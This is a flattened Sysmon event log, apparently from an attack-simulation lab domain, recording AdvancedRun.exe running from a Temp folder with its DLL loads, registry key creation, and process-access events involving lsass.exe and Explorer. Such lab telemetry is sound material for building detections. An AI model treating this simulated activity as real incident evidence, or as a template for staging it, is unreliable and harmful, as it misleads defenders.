20:10:04.993{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004068424Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.993{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=12ED40D048D0F5F44D3877936A1B7E8B,SHA256=8E652B0663D0F0C6BFE7102329C9A84FB1E937273E51F8FF0FC3469350AF5C41trueMicrosoft WindowsValidATTACKRANGE\Administrator 13241300x80000000000000004068423Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:10:04.991{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 
12241200x80000000000000004068422Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:04.991{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersATTACKRANGE\Administrator 12241200x80000000000000004068421Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:04.991{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceATTACKRANGE\Administrator 734700x80000000000000004068420Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.203{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=DDB56B83B18735F13FD1CBEF877E9DB0,SHA256=C5EF7185888F971CFA486B64D71514512C1CCBAB8C5A1D8610CAE54476407126trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068419Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.203{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\urlmon.dll11.00.14393.4770 (rs1_release.211101-1440)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=31A5C5B3C53CA5692BDE66730F5F09A9,SHA256=829D456F894EDBBC4F0EC02627788D31801743BB047D6FD100BE05F0CBCFB2E1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068418Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:04.199{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives Library (Wow64)Microsoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=80F9B9D2B1258D35F129D9210DC9CE20,SHA256=9653E29AA9499123EBFA49C4BA69E345F8A10029B00B790946DDFE040436EF6DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068417Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.199{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\wkscli.dll10.0.14393.4886 (rs1_release.220104-1735)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3E8769CD76B02894C3881018E0F9334C,SHA256=9DE69FDC7C3FE2ED664F68191CC92367B377FC096E42E2895FBF50D98D150A5CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068416Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.198{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=A612555310B7F2A688FA57C7C10615BC,SHA256=028B8BA6A6CF74776C8E4F7485BB7973DE25242F292F837D78AB9CFCC3E8AC90trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068415Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.197{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\winhttp.dll10.0.14393.4467 (rs1_release.210604-1844)Windows HTTP ServicesMicrosoft® Windows® Operating SystemMicrosoft 
Corporationwinhttp.dllMD5=F5FF215A5AE295644FE12BEAF6B75D00,SHA256=714EEB3B620CC9E368813728B1D247684519A3181211CDB5FCC37451F9BC2B96trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068414Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.192{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\netapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=B7B1A7C51A29273242E59A7AEC3CF193,SHA256=474C74D69EFC73F999687E998E9B05EF0E6A8F78A1A8E89D5E390411E4B91C05trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068413Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.192{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\iertutil.dll11.00.14393.4770 (rs1_release.211101-1440)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=C75F602912711A5B1270583E08F08C44,SHA256=571BBC3AD8076548129046D7432FB703235F0F6145109C15C0356C874985C239trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068412Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.191{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ieframe.dll11.00.14393.4886 (rs1_release.220104-1735)Internet BrowserInternet ExplorerMicrosoft CorporationIEFRAME.DLLMD5=7391061488EF087EC8B923263F5901E3,SHA256=5434336F96071153401C0616C4DCCA942D259EC97A102DBF590CA401F2E6EBA1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068397Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:03.985{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\actxprxy.dll10.0.14393.3808 (rs1_release.200707-2105)ActiveX Interface Marshaling LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationActXPrxy.dllMD5=CA7A58C10B61327C283100DD9277811A,SHA256=13D357E647DB3DFDFE35C56E4CC78244B35647CCA53D34F94F318DA7C848E09FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 12241200x80000000000000004068386Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:03.993{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersATTACKRANGE\Administrator 12241200x80000000000000004068385Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:03.990{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceATTACKRANGE\Administrator 734700x80000000000000004068366Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:03.917{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.14393.4886_none_f67b299ef24e3cc8\GdiPlus.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft GDI+Microsoft® Windows® Operating SystemMicrosoft CorporationgdiplusMD5=3033965E4D4268DA640BBD453A75C6AB,SHA256=C568E3A1429BE3EAF98B309B4E0A3E940FB00ACFB7C73ADF92947A4B61650490trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068355Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:03.933{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=21062367FEB4D61857A65449EA516260,SHA256=FA481B495A9FE2E3E78173C9B065E4292911A1CD403D90A03058A54309366D17trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068336Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:03.864{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\wpdshext.dll10.0.14393.4169 (rs1_release.210107-1130)Portable Devices Shell ExtensionMicrosoft® Windows® Operating SystemMicrosoft CorporationWpdShExt.dllMD5=CD64A4E76AE86A8F150A0887A989490E,SHA256=D68D76FF62932D6202E0476172E9CAF135B4DD8E224895436A4AB99FDFB2433FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068309Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:03.811{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\DevDispItemProvider.dll10.0.14393.0 (rs1_release.160715-1616)DeviceItem inproc devquery subsystemMicrosoft® Windows® Operating SystemMicrosoft CorporationDevDispItemProvider.dllMD5=4FE46B3CD310664F540E4712103570E1,SHA256=D08940F1AE6F9B63872763E14950ADCACBA34BFC8ADB070563BF6FDA6E17E955trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068291Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:03.796{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\PlayToDevice.dll10.0.14393.4169 (rs1_release.210107-1130)PLAYTODEVICE DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationPlaytoDevice.dllMD5=171ADC2789D5DC6B6316A0C9060419E4,SHA256=67E15E6F78A4777B312641F2D9CFCB1CB2B1F9784F75321155126B3038892DB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004068261Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:03.775{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dlnashext.dll10.0.14393.4169 (rs1_release.210107-1130)DLNA Namespace DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationdlnashext.dllMD5=BA4EF83084B94D36767C9413812E01BD,SHA256=F77B664AC17417F5066805CF880769DE6159F7BF2BB60BF25284C23FAA089AEAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004068245Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:03.797{834264DD-DAE6-61EA-0D00-000000002702}876136C:\Windows\system32\svchost.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004068240Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:03.765{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=C5114D5A60467157B35D494D927325AB,SHA256=BE91B4149E5C074DE9055BF3914EF746F9776C2771BEA9E0336867A82A827C0DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004068084Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.468{834264DD-DB11-61EA-9500-000000002702}4283148C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068083Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:09:26.467{834264DD-DB11-61EA-9500-000000002702}4283148C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068082Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.467{834264DD-DB11-61EA-9500-000000002702}4283148C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068081Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:09:26.463{834264DD-DB11-61EA-9500-000000002702}4285184C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068080Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.462{834264DD-DB11-61EA-9500-000000002702}4285184C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068079Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:09:26.462{834264DD-DB11-61EA-9500-000000002702}4285184C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068076Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.461{834264DD-DB11-61EA-9500-000000002702}4285184C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068075Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:09:26.423{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068074Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.423{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068073Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.417{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068072Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:09:26.417{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068071Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.417{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004068070Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:09:26.417{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000004068069Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
